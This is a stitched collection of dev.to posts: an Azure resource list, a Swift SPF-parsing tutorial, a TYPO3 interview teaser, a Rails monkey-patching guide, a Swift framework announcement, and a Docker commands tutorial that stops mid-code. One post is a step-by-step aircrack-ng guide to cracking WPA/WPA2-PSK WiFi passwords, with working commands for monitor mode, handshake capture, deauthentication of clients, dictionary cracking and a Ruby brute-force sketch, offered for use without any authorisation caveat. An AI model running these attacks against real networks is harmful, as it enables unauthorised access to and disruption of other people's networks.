* [Set up your custom domain](https://docs.microsoft.com/en-us/azure/static-web-apps/custom-domain?tabs=azure-dns&WT.mc_id=javascript-28641-ayyonet)
* [How to do custom authentication with Azure Static Web Apps](https://docs.microsoft.com/en-us/azure/static-web-apps/authentication-custom?tabs=aad&WT.mc_id=javascript-28641-ayyonet)
### Code Samples
* [Microsoft code samples](https://github.com/microsoft/static-web-apps-gallery-code-samples?WT.mc_id=javascript-28641-ayyonet) with lots of cool projects for different frameworks and integrations like [Azure Functions](https://docs.microsoft.com/en-us/azure/azure-functions/?WT.mc_id=javascript-28641-ayyonet) or [Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/?WT.mc_id=javascript-28641-ayyonet)

* [Awesome List of Azure Static Web Apps](https://github.com/microsoft/static-web-apps-gallery-code-samples/blob/master/media/angular-search-experience.gif)
* Finally, join us at [AI Show Live](https://www.microsoft.com/en-us/devrel/cognitiveservices/?WT.mc_id=aiml-28641-ayyonet) to see how we build and deploy with Cognitive Services for [AI Playground](https://github.com/aiadvocates/AIPlayground). Ask your questions and let us know the features you want to see on our [Github Discussion](https://github.com/aiadvocates/AIPlayground/discussions/?WT.mc_id=aiml-8567-ayyonet).
[](https://www.youtube.com/playlist?list=PLlrxD0HtieHinivDFATQd5qyjL6ijKHUF)
Let us know in the comments what you think and what you would like to see as a tutorial, code sample or a video about Azure Static Web Apps.
{% tag git %}{% tag webdev %}{% tag staticwebapps %} | yonet |
697,956 | Hacking wireless access points | If you want to know how to hack WiFi access points -- just read this step by step aircrack-ng tutoria... | 0 | 2021-05-14T07:36:23 | https://dev.to/rootsec1/hacking-wireless-access-points-598j | security |
If you want to know how to hack WiFi access points -- just read this step by step `aircrack-ng` tutorial, run the verified commands and crack passwords easily.
With the help of these commands you will be able to hack WiFi APs (access points) that use WPA/WPA2-PSK (pre-shared key) encryption.
The basis of this method of hacking WiFi lies in capturing the WPA/WPA2 authentication handshake and then cracking the PSK using `aircrack-ng`.
# Section 1, Aircrack-ng: Download and Install
-------------------------------------
### How to hack Wireless Access Points -- the action plan:
1. Download and install the latest `aircrack-ng`
2. Start the wireless interface in monitor mode using the `airmon-ng`
3. Start the `airodump-ng` on AP channel with filter for BSSID to collect authentication handshake
4. [Optional] Use the `aireplay-ng` to deauthenticate the wireless client
5. Run the `aircrack-ng` to hack the WiFi password by cracking the authentication handshake
### Install the required dependencies:
```console
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
```
### Download and install the latest `aircrack-ng` ([current version](http://www.aircrack-ng.org/doku.php?id=install_aircrack#current_version)):
```console
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install
```
### Ensure that you have installed the latest version of `aircrack-ng`:
```console
$ aircrack-ng --help
Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
http://www.aircrack-ng.org
```
# Section 2, Airmon-ng: Monitor Mode
---------------------------
Now it is required to start the wireless interface in monitor mode.
Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network.
What is especially important for us -- monitor mode allows packets to be captured without having to associate with an access point.
Find and stop all the processes that use the wireless interface and may cause trouble:
```console
$ sudo airmon-ng check kill
```
### Start the wireless interface in monitor mode:
```console
$ sudo airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 6235 iwlwifi - [phy0]
(monitor mode enabled on mon0)
```
In the example above, `airmon-ng` has created a new wireless interface called `mon0` and enabled monitor mode on it.
So `mon0` is the correct interface name to use in the next parts of this tutorial.
# Section 3, Airodump-ng: Authentication Handshake
-----------------------------------------
Now that our wireless adapter is in monitor mode, we can see all the wireless traffic passing by in the air.
This can be done with the `airodump-ng` command:
```console
$ sudo airodump-ng mon0
```
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:
```console
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1
66:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 - 32 0 1
```
Start the `airodump-ng` on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:
```console
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
```
| Option | Description |
|-------------------------|-------------|
| `-c` | The channel for the wireless network |
| `--bssid` | The MAC address of the access point |
| `-w` | The file name prefix for the file which will contain authentication handshake |
| `mon0` | The wireless interface |
| `--ignore-negative-one` | Fixes the 'fixed channel : -1' error message |
Now wait until `airodump-ng` captures a handshake.
If you want to speed up this process, skip ahead to Section 4 (Aireplay-ng) and force the wireless client to reauthenticate.
After some time you should see the `WPA handshake: 00:11:22:33:44:55` in the top right-hand corner of the screen.
This means that the `airodump-ng` has successfully captured the handshake:
```console
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 WPA handshake: 00:11:22:33:44:55
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
```
# Section 4, Aireplay-ng: Deauthenticate Client
--------------------------------------
If you can't wait till `airodump-ng` captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.
### Send deauth to broadcast:
```console
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
```
### Send directed deauth (attack is more effective when it is targeted):
```console
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
```
| Option | Description |
|--------|-------------|
| `--deauth 100` | The number of de-authenticate frames you want to send (0 for unlimited) |
| `-a` | The MAC address of the access point |
| `-c` | The MAC address of the client |
| `mon0` | The wireless interface |
| `--ignore-negative-one` | Fixes the 'fixed channel : -1' error message |
# Section 5, Aircrack-ng: Hack WiFi Password
-----------------------------------
Unfortunately, there is no way to break WPA/WPA2-PSK encryption other than brute force.
To hack a WiFi password, you need a password dictionary.
And remember that this type of attack is only as good as your password dictionary.
You can download some dictionaries from [here](https://wiki.skullsecurity.org/Passwords).
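Conceptually, the dictionary attack is just a loop: derive a key from each candidate passphrase the same way WPA does (PBKDF2-HMAC-SHA1, salted with the ESSID) and compare it against material recovered from the captured handshake. Here is a toy Ruby sketch with made-up values — this is not part of aircrack-ng, just an illustration of why the attack is slow and dictionary-bound:

```ruby
require 'openssl'

ssid = "CrackMe" # the AP's ESSID salts the key derivation in WPA-PSK

# Pretend this PMK was recovered from a captured handshake.
# WPA derives it as PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits).
target_pmk = OpenSSL::PKCS5.pbkdf2_hmac_sha1("987654321", ssid, 4096, 32)

dictionary = ["password", "letmein", "987654321"]

# Try every candidate; the 4096 PBKDF2 rounds are what make this slow.
found = dictionary.find do |candidate|
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(candidate, ssid, 4096, 32) == target_pmk
end

puts found # => 987654321
```

If the real passphrase is not in your dictionary, the loop simply never matches — which is exactly why the quality of the wordlist matters so much.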
### Crack the WPA/WPA2-PSK with the following command:
```console
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
```
| Option | Description |
|--------|-------------|
| `-w` | The name of the dictionary file |
| `-b` | The MAC address of the access point |
| `WPAcrack.cap` | The name of the file that contains the authentication handshake |
Sample output:
```console
Aircrack-ng 1.2 beta3 r2393
[00:08:11] 548872 keys tested (1425.24 k/s)
KEY FOUND! [ 987654321 ]
Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5
Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3
EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
```
| rootsec1 |
697,964 | Swift: Deconstruct SPF: Struct Mechanism | Today, I will start on building out the functionality of the struct Mechanism. This will involve... | 12,710 | 2021-05-20T04:09:44 | https://bas-man.dev/post/swift/swift-spf-struct-mechanims/ | swift, beginners, package, spf |
Today, I will start on building out the functionality of the `struct Mechanism`.
This will involve creating some tests, and basic functions.
## Instantiate the Mechanism Struct
We have our struct defined as such:
```swift
struct Mechanism {
var kind: MechanismKind;
var qualifier: Qualifier;
var mechanism: String;
init(k: MechanismKind, q: Qualifier, m: String) {
kind = k;
qualifier = q;
mechanism = m;
}
func mechanismString() -> String {
return self.mechanism;
}
func whatKind() -> MechanismKind {
return self.kind;
}
func isPass() -> Bool {
return self.qualifier == Qualifier.Pass;
}
func isFail() -> Bool {
return self.qualifier == Qualifier.Fail;
}
func isSoftFail() -> Bool {
return self.qualifier == Qualifier.SoftFail;
}
func isNeutral() -> Bool {
return self.qualifier == Qualifier.Neutral;
}
func isNone() -> Bool {
return self.qualifier == Qualifier.None;
}
}
```
### init
This will instantiate the struct, providing what kind of **mechanism** it is, its **qualifier**, and the value of its **mechanism**.
### mechanismString
This will allow us to access the information stored in `mechanism` as a simple `String`
### isPass
This will return `Bool` of **true** if the Qualifier is `Pass`
### isFail
This will return `Bool` of **true** if the Qualifier is `Fail`
### isSoftFail
This will return `Bool` of **true** if the Qualifier is `SoftFail`
### isNeutral
This will return `Bool` of **true** if the Qualifier is `Neutral`
### isNone
This will return `Bool` of **true** if the Qualifier is `None`
### whatKind
This will help us understand if the mechanism represents a **redirect**, **A**, or some other mechanism.
## Testing
For this we need to take a look at `Tests/DeconSpfTests/DeconSpfTests.swift`.
Within this file we have the following initial set of code.
```swift
import XCTest
@testable import DeconSpf;
final class SPFTests: XCTestCase {
func testMechanismRedirect() {
let Mech = Mechanism(k: MechanismKind.Redirect, q: Qualifier.None, m: "test.com");
XCTAssertEqual(Mech.mechanismString(), "test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isNone(), true);
}
func testMechanismInclude() {
let Mech = Mechanism(k: MechanismKind.Include, q: Qualifier.Pass, m: "_spf.test.com");
XCTAssertEqual(Mech.mechanismString(), "_spf.test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Include);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isPass(), true);
}
static var allTests = [
("testMechanismRedirect", testMechanismRedirect),
("testMechanismInclude", testMechanismInclude),
]
}
```
Let's break down each test function.
```swift
func testMechanismRedirect() {
let Mech = Mechanism(k: MechanismKind.Redirect, q: Qualifier.None, m: "test.com");
XCTAssertEqual(Mech.mechanismString(), "test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isNone(), true);
}
```
What is happening here: we instantiate `Mech` and then make four assertions.
1. mechanismString() matches "test.com"
2. whatKind() matches MechanismKind.Redirect
3. The MechanismKind is not MechanismKind.A
4. isNone() is `true`
```swift
func testMechanismInclude() {
let Mech = Mechanism(k: MechanismKind.Include, q: Qualifier.Pass, m: "_spf.test.com");
XCTAssertEqual(Mech.mechanismString(), "_spf.test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Include);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isPass(), true);
}
```
This performs the same basic tests, but for a mechanism that should be of kind MechanismKind.Include.
## Running the Tests
```zsh
swift test
```
### Output
```zsh
[6/6] Linking DeconSpfPackageTests
Test Suite 'All tests' started at 2021-05-13 15:09:48.435
Test Suite 'DeconSpfPackageTests.xctest' started at 2021-05-13 15:09:48.436
Test Suite 'SPFTests' started at 2021-05-13 15:09:48.436
Test Case '-[DeconSpfTests.SPFTests testMechanismInclude]' started.
Test Case '-[DeconSpfTests.SPFTests testMechanismInclude]' passed (0.082 seconds).
Test Case '-[DeconSpfTests.SPFTests testMechanismRedirect]' started.
Test Case '-[DeconSpfTests.SPFTests testMechanismRedirect]' passed (0.000 seconds).
Test Suite 'SPFTests' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.083) seconds
Test Suite 'DeconSpfPackageTests.xctest' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.083) seconds
Test Suite 'All tests' passed at 2021-05-13 15:09:48.519.
Executed 2 tests, with 0 failures (0 unexpected) in 0.083 (0.084) seconds
```
### Let's add a new test
We want to be able to get a string representation of the mechanism as it was originally seen.
If I had an initial mechanism of `ip4:x.x.x.x` which was stored as
- kind: MechanismKind.Ip4
- qualifier: Qualifier.None
- mechanism: "x.x.x.x"
I should be able to call `mech.asMechanism()` and get `ip4:x.x.x.x` in return.
So let's make a test for this (expect it to fail for now).
We update the `DeconSpfTests.swift` with the following.
```swift
func testAsMechanism() {
let Mech = Mechanism(k: MechanismKind.Ip4, q: Qualifier.None, m: "192.168.1.0/24");
XCTAssertEqual(Mech.asMechanism(), "ip4:192.168.1.0/24");
}
static var allTests = [
("testMechanismRedirect", testMechanismRedirect),
("testMechanismInclude", testMechanismInclude),
("testAsMechanism", testAsMechanism),
]
```
We add this test to the `allTests` so that it will be run with the others.
**Xcode** also complains
`Value of type 'Mechanism' has no member 'asMechanism'`.
This is because I have not yet defined a member function named `asMechanism()` on the **Mechanism** struct.
The code for this project can now be found [here](https://github.com/Bas-Man/swift-decon-spf).
This is the [diff](https://github.com/Bas-Man/swift-decon-spf/compare/Initial...QualifierGet) between the initial commit and the current code.
## Closing
That's it for today. In the next article. I will look at returning values based on the `Qualifier` type. These will be needed to build the string for `asMechanism()`
| basman |
698,004 | TYPO3 Talk with Tim: Author Of TYPO3 Blogger | We have Tim Lochmüller with us this week for an interesting TYPO3 Talk! Tim Lochmüller is the author... | 0 | 2021-05-14T09:17:45 | https://dev.to/t3terminal/typo3-talk-with-tim-author-of-typo3-blogger-an1 | We have Tim Lochmüller with us this week for an interesting TYPO3 Talk! Tim Lochmüller is the author of TYPO3 Blogger and works for the TYPO3 agency HDNET and has been working with TYPO3 since 2004.
The TYPO3 Talk with Tim is interesting, so grab that cup of coffee to explore Tim's insights into his views, the history and potential of TYPO3 and the open-source community, and how we can build a better TYPO3 ecosystem together!
Interviewee: Tim Lochmüller
Company: HDNET GmbH & Co. KG
Designation: Author of TYPO3 Blogger
Topic: Together Building a Better TYPO3 Eco-system
Let's explore his journey with TYPO3 from then to now, and much more! https://t3terminal.com/blog/typo3-talk-with-tim-author-of-typo3-blogger/ | t3terminal | |
708,211 | Applying monkey patches in Rails | Monkey patching is one of Ruby's most powerful features. It allows programmers to add methods to core... | 0 | 2021-05-25T13:43:50 | https://dev.to/ayushn21/applying-monkey-patches-in-rails-1bj1 | ruby, rails | [Monkey patching](https://en.wikipedia.org/wiki/Monkey_patch) is one of Ruby's most powerful features. It allows programmers to add methods to core classes which can result in some very elegant APIs. However it's quite easy to shoot yourself in the foot if you don't know what you're doing.
[This post from Justin Weiss](https://www.justinweiss.com/articles/3-ways-to-monkey-patch-without-making-a-mess/) is a brilliant guide on how to monkey patch responsibly. However he doesn't describe how to actually include your monkey patches in a Rails app, so that's what I'm going to describe in this post.
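For contrast, here is the naive form of a monkey patch, where we simply reopen the core class in place (the method name below is invented for illustration):

```ruby
require 'set'

# Naive monkey patch: reopen the core class directly.
class Array
  def to_set_naive
    Set.new(self)
  end
end

p [1, 2, 2, 3].to_set_naive # => #<Set: {1, 2, 3}>

# Downside: the method's owner is Array itself, so nothing records
# which file or gem added it.
p Array.instance_method(:to_set_naive).owner # => Array
```

It works, but the method's origin is untraceable — which is exactly the mess the namespaced-module approach below avoids.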
Following Justin's advice, the implementation of all our monkey patches should go in the `lib/core_extensions` directory. So we might have some files like this:
`lib/core_extensions/array.rb`
```ruby
module CoreExtensions
module Array
def to_set
Set.new(self)
end
end
end
```
`lib/core_extensions/hash.rb`
```ruby
module CoreExtensions
module Hash
def keys_as_set
Set.new(keys)
end
end
end
```
The `lib/` directory in Rails is not autoloaded, so to apply these patches we need to run some code when our app boots. The best place to do this is to create a file called `monkey_patches.rb` under `config/initializers/`. All files in this directory are executed when Rails boots.
The contents of the file would look like:
```ruby
# Require all Ruby files in the core_extensions directory
Dir[Rails.root.join('lib', 'core_extensions', '*.rb')].each { |f| require f }
# Apply the monkey patches
Array.include CoreExtensions::Array
Hash.include CoreExtensions::Hash
```
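Putting the pieces together in one self-contained sketch (no Rails required), we can also see a payoff of the module approach: the patch is visible in the class's ancestor chain, so its origin is easy to trace later.

```ruby
require 'set'

module CoreExtensions
  module Array
    def to_set
      Set.new(self)
    end
  end
end

# What config/initializers/monkey_patches.rb does at boot:
Array.include CoreExtensions::Array

p [1, 1, 2].to_set # => #<Set: {1, 2}>

# Unlike reopening the class, the module shows up in the ancestry,
# which makes the patch discoverable.
p Array.ancestors.first(2) # => [Array, CoreExtensions::Array]
```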
This method works fine when we're patching Ruby's core classes, but if we want to patch classes in Rails frameworks such as `ActiveStorage` or `ActionText`, it's a bit trickier, as those classes may not be loaded yet when the initializers are executed.
As you might expect from Rails, there's an elegant way to hook into the load process of those classes via `ActiveSupport`. So if we wanted to apply patches to `ActiveStorage::Attachment` and `ActionText::RichText`, we can include the following code in the `monkey_patches.rb`:
```ruby
ActiveSupport.on_load(:action_text_rich_text) do
ActionText::RichText.include CoreExtensions::ActionText::RichText
end
ActiveSupport.on_load(:active_storage_attachment) do
ActiveStorage::Attachment.include CoreExtensions::ActiveStorage::Attachment
end
```
The above code will apply our patches right after the relevant classes are loaded!
If you look at the [source code](https://github.com/rails/rails/blob/main/activestorage/app/models/active_storage/attachment.rb) for one of the above two classes, you'll see a line like this right at the bottom:
```ruby
ActiveSupport.run_load_hooks :active_storage_attachment, ActiveStorage::Attachment
```
This is where the name of the hook that we pass into the `on_load` method when applying our patch is defined.
You can also run load hooks for your own app's classes in the same way to apply some configuration at boot time. A great example would be when using the adapter pattern to integrate with external services, but that's a topic for another blog post!
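To make the mechanism concrete without pulling in Rails, here is a tiny, dependency-free approximation of how lazy load hooks behave. The `LazyHooks`, `Shoutable`, and `Greeter` names are invented for illustration — the real implementation lives in `ActiveSupport::LazyLoadHooks`:

```ruby
# Minimal stand-in for ActiveSupport's lazy load hooks, to show the idea.
module LazyHooks
  @hooks = Hash.new { |h, k| h[k] = [] }

  # Register a block to run when the named component loads.
  def self.on_load(name, &block)
    @hooks[name] << block
  end

  # Called by the component itself, once it has finished loading.
  def self.run_load_hooks(name, base)
    @hooks[name].each { |blk| base.instance_eval(&blk) }
  end
end

module Shoutable
  def shout(text)
    text.upcase
  end
end

# Registered *before* Greeter exists -- just like an initializer runs
# before the Rails frameworks are loaded.
LazyHooks.on_load(:greeter) { include Shoutable }

class Greeter; end
LazyHooks.run_load_hooks(:greeter, Greeter) # fired when the class "loads"

puts Greeter.new.shout("hello") # => HELLO
```

The subscriber never needs to know *when* the class loads; the class announces itself, and any pending configuration runs at that moment.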
This post was originally published on [my blog](https://binarysolo.chapter24.blog/applying-monkey-patches-in-rails/). | ayushn21 |
698,154 | Boken Engine | Hi all, just joined the community. First time posting here, long time reading awesome published conte... | 0 | 2021-05-14T11:34:04 | https://dev.to/s3rrot/boken-engine-5ce1 | opensource, framework, swift, xcode | Hi all, just joined the community. First time posting here, long time reading awesome published content.

At my current job we have been working on a **Swift framework** for creating slide-based, non-linear visual stories and presentations.
Its name is **Boken Engine**. We have a beta version and it's open source, so you can play with it; if you find any bugs you can file a bug report, and if you know how to fix them we'd love to have new contributors. ;)
The idea is that any user, with only a few lines of code, can generate **full-fledged visual stories or slide-based presentations for iOS devices**. It is based on SpriteKit, and content is provided through JSON files (plus additional image and sound assets to enrich your story).
You can visit the project on [GitHub](https://github.com/boken-engine/boken-engine)
Any feedback would be appreciated. Thanks in advance.
699,857 | How to use Docker commands | In this post, we'll learn how to use Docker commands. We will make a web app inside a Docker... | 0 | 2021-05-16T14:22:11 | https://www.steadylearner.com/blog/how-to-use-docker-commands-42da | docker, tutorial, beginners, devops | <!--
Post{
subtitle: "Learn how to use Docker and upload its images to Docker Hub"
image: "posts/web/docker.png",
image_decription: "Image from the official website",
tags: "How use Docker code",
}
-->
<!-- Link -->
[Steadylearner]: https://www.steadylearner.com
[Docker Website]: https://docs.docker.com/get-started
[How to install Docker]: https://www.google.com/search?q=how+to+install+docker
[How to deploy a container with Docker]: https://thenewstack.io/how-to-deploy-a-container-with-docker/
[Docker Curriculum]: https://docker-curriculum.com/
[Docker Hub]: https://hub.docker.com/
[Docker lifecycle]: https://medium.com/@BeNitinAgarwal/lifecycle-of-docker-container-d2da9f85959
[AWS]: https://aws.amazon.com
[Elastic Beanstalk]: https://aws.amazon.com/pt/elasticbeanstalk/
[ECS]: https://aws.amazon.com/ecs/
[CloudFormation]: https://aws.amazon.com/pt/cloudformation/
[Yarn]: https://yarnpkg.com/lang/en/
[Express]: https://expressjs.com/
[comment]: # (Updated the Docker lifecycle link, as suggested in the report)
<!-- / -->
<!-- Steadylearner Post -->
[Steadylearner Blog]: https://www.steadylearner.com/blog
<!-- / -->
<!-- Steadylearner Twitter and LinkedIn -->
[Twitter]: https://twitter.com/steadylearner_p
[LinkedIn]: https://www.linkedin.com/in/steady-learner-3151b7164/
<!-- -->
In this post, we'll learn how to use Docker commands. We will make a web app inside a Docker container and turn it into a Docker image. We'll also learn how to upload it to [Docker Hub].
[You can find Portuguese version of this post here.](https://dev.to/steadylearner/como-usar-comandos-docker-1j76)
<br />
<h2 class="red-white">Prerequisite</h2>
1. [How to install Docker]
2. [Docker Website], [Docker Curriculum]
3. [How to deploy a container with Docker], [Docker lifecycle]
---
First, you must install Docker if you don't have it yet. Type **$docker** on your machine and you will be shown how to proceed with the installation, or just search in your browser for how to install it.
This post is a summary of [Docker Website], [Docker Curriculum] etc. I hope you read them first, but you don't have to spend a lot of time with them. We'll learn how to deploy a web app and microservices to [AWS] with other [Steadylearner Blog] posts.
<br />
<h2 class="blue">Table of Contents</h2>
1. Confirm installation with Nginx
2. Set up your development environment with Docker
3. How to move your local files and folders to docker containers
4. How to use the web framework with docker containers
5. How to modify the network ports of docker images
6. Docker Images and Containers
7. How to upload your Docker images to Docker Hub
8. Conclusion
---
<br />
## 1. Confirm installation with Nginx
I hope you were able to install Docker. Before we learn how each Docker command works, let's test that it shows some results on your machine.
Use them in your CLI.
```console
$docker search nginx
$docker pull nginx
$docker run --name nginx-webserver -p 80:80 nginx
```
Then, access [localhost](http://localhost). This will be shown in your browser:
```console
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.
For online documentation and support please refer to nginx.org.
Commercial support is available at nginx.com.
Thank you for using nginx.
```
Realize that you only need a few commands to use Docker. You can also start a Docker container with a specific name and execute bash commands in it with these:
```console
$docker run --name nginx-webserver -p 80:80 -d nginx
$docker exec -it CONTAINER_ID bash
```
<br />
## 2. Set up your development environment with Docker
In this section, we'll learn how to set up a default Docker image with Ubuntu. It will be possible to reuse this image later. If you use another OS, please, use that instead and refer to this part.
Start with the **pull** command to download the official ubuntu image from [Docker Hub]. If Docker Hub is new to you, you can compare it to GitHub because of its repositories.
```console
$docker pull ubuntu
```
Now, create a container on your machine. To download some minimal software, run sh or bash inside it with this:
```console
$docker run -it ubuntu sh
```
Start by installing **CURL** to download other programs.
```console
$apt-get update
$apt-get install curl
$curl https://www.steadylearner.com
```
If you left the container, re-enter it with this:
```console
$docker exec -it CONTAINER_ID bash
```
You can find the CONTAINER_ID with **docker ps -a**. This is the command you will use often and it will show you some useful metadata of Docker containers.
We'll make a simple Node "Hello, World" web app example in this post. Let's start by configuring the Node development environment. Follow these steps if you want to use the same project as this post.
Also, you can use [$docker run -d steadylearner/ubuntu_node](https://cloud.docker.com/u/steadylearner/repository/docker/steadylearner/ubuntu_node) instead.
You should be inside your docker container to use them.
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Node, NPM, Yarn</summary>
```console
curl -sL https://deb.nodesource.com/setup_12.x | bash
```
This will be displayed:
```console
## Run `sudo apt-get install -y nodejs` to install Node.js 12.x and npm
## You may also need development tools to build native addons:
sudo apt-get install gcc g++ make
## To install the Yarn package manager, run:
curl -sL https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
sudo apt-get update && sudo apt-get install yarn
```
You should use the commands without sudo, since you are root inside the container.
```console
apt-get install gcc g++ make
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | tee /etc/apt/sources.list.d/yarn.list
apt-get update && apt-get install yarn
```
Follow those commands and install them all.
Test Node work with this:
```console
$node
$console.log("Hello from www.steadylearner.com");
```
</details>
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Vim</summary>
Use this command with --assume-yes or -y to skip relevant install questions.
```console
apt install --assume-yes vim
```
Vim text editor will be installed. Now, use this command to use it:
```console
$vim hello.js
```
Edit your hello.js file as below, then type **:wq** to save and quit Vim.
```js
// hello.js
console.log("Hello from www.steadylearner.com");
```
Use this command to verify that Node is installed correctly:
```console
$node hello.js
// Hello from www.steadylearner.com
```
</details>
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Git</summary>
```console
$apt-get install --assume-yes git-core
```
This will install Git. Verify that it is installed and check its version:
```console
$git --version
```
Then, get your GitHub username and email from your local machine:
```console
$git config --get user.name
$git config --get user.email
```
Use them in the Docker container to operate Git inside:
```console
$git config --global user.name yourname
$git config --global user.email youremail
```
Use the same --get commands as before to check them inside your Docker container.
Test Git clone work to download files from your previous GitHub repositories. For example, clone [steadylearner/docker-examples](http://github.com/steadylearner/docker-examples) repository with this:
[comment]: # (Just added a link to the repository)
```console
$git clone https://github.com/steadylearner/docker-examples.git
```
</details>
I hope you can install everything you think is necessary in your Docker container.
You can skip this Yarn-related part and use the default npm commands instead. Otherwise, read [this post](https://linuxize.com/post/how-to-install-yarn-on-ubuntu-18-04/) for more information.
First, verify the [Yarn] version inside the container.
```console
$yarn -v
```
It will show the version of your Yarn.
Next, use these commands to use Node project:
```console
$cd /home
$mkdir node && cd node
$yarn init
$yarn add chalk
```
Test NPM or Yarn work with NPM modules with these:
```js
// Start with $node in your console and use each command.
const chalk = require("chalk");
const blue = chalk.blue;
const hello = blue("Hello from www.steadylearner.com");
console.log(hello);
```
It should have shown **Hello from www.steadylearner.com** message in your console.
We verified that NPM packages work in your docker container with this.
[comment]: # (Is something missing here?)
If you want, make an alias for this directory in a similar way:
```console
$vim ~/.bashrc
```
Type this and :wq to save and quit.
```bash
alias work="cd /home/node"
```
Use **$source ~/.bashrc** and you can open your node project with **$work** whenever you want. You can also define WORKDIR later with a **Dockerfile** or **docker-compose.yml** for the same purpose.
There will be many Docker containers on your machine. Use these commands to remove unnecessary ones:
**1.** List and remove previous Docker containers.
```console
$docker ps -a
```
The list of instances that you ran before will be shown.
**2.** Remove what you don't need.
```console
$docker stop containerid
$docker rm containerid
```
or
```console
$docker rm containerid -f
```
<br />
## 3. How to move your local files and folders to docker containers
We can use Git commands to download files from the GitHub into your containers. Moreover, you can use Docker commands to move local files and folders to your Docker containers and vice versa.
Refer to these examples or **docker cp --help**.
**1.** Files
```console
$docker cp from_localhost.txt containerid:/from_localhost.txt
$docker cp containerid:/from_docker from_docker.txt
```
**2.** Folders
```console
$docker cp from_localhost containerid:/from_localhost
$docker cp containerid:/from_localhost from_localhost
```
<br />
## 4. How to use web frameworks with docker containers
We installed the Node-related software for this part. If you use a web framework from another language, please refer only to the workflow of this section.
<details>
<summary class="red-white font-normal hover cursor-pointer transition-half">Express</summary>
Install the dependencies we'll use inside the docker container with this:
```console
$yarn add express chalk
```
Next, we'll build "Hello, World!" app with the JavaScript code below.
```js
// server.js
const express = require('express')
const chalk = require("chalk");
const app = express()
const port = 3000
app.get('/', (req, res) => res.send('Hello, World!'))
const blue = chalk.blue
const target = blue(`http://localhost:${port}`)
app.listen(port, () => console.log(`Express Server ready at ${target}`))
```
Then, **$node server.js** will display this message:
```console
Express Server ready at http://localhost:3000
```
But **$curl http://localhost:3000** or visiting it in your browser won't work yet.
Each container has its own IP on the network. We should inspect the docker container with **$docker inspect CONTAINER_ID > inspect.txt** to extract the information from it.
You can find its local IP at the end of inspect.txt and it will be similar to **172.17.0.2**. Save time by writing getIP.js and running **$node getIP.js**.
```js
const fs = require('fs')
const filename = "inspect.txt";
fs.readFile(filename, 'utf8', function(err, data) {
  if (err) throw err;
  const dataObject = JSON.parse(data);
  const ip = dataObject[0].NetworkSettings.IPAddress;
